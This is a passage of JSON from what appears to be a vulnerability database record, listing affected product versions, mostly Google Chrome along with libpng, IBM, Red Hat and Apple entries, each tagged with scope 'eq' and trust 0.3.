"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1017.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.4.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.954.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.640.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.73"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.88"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.110"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.759.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.587.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.42"
},
{
"_id": null,
"model": "enterprise linux hpc node",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1305.1"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.13"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.2.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1661.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.662.0"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.149"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.48"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.833.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.119"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1281.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.810.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.871.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1681.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.88"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.649.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.692.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.83"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.93"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.639.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.56"
},
{
"_id": null,
"model": "ilog optimization decision manager enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.7.0.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.58"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.98"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.17"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.3.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.630.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.2"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.885.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.52"
},
{
"_id": null,
"model": "vios",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.569.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.962.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1675.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.123"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.619.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.25"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.47"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.124"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.100"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.160"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1679.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.1"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.0.0.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.661.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.106"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.91"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.6.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.939.1"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.68"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.110"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.893.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.99"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "48.0.2564.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.883.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.41"
},
{
"_id": null,
"model": "powerkvm",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.120"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.935.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.705.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1082.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.15"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.122"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1016.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.118"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.776.1"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1305.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.1"
},
{
"_id": null,
"model": "filenet system monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.72"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1075.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.36"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.24"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.84"
},
{
"_id": null,
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.4.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "43.0.2357.65"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.172"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.117"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.107"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.34"
},
{
"_id": null,
"model": "decision optimization center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.18"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.776.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.96379"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.900.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1074.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.126"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.75"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.611.1"
},
{
"_id": null,
"model": "forms viewer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.892.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.51"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.29"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1658.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.897.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.102"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.132"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.56"
},
{
"_id": null,
"model": "tivoli network manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "36.0.1985.143"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1003.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.927.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1021.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.818.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.11.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1065.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.674.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.39"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.905.0"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.84"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1284.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.115"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.59"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1040.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.939.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.758.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.93"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
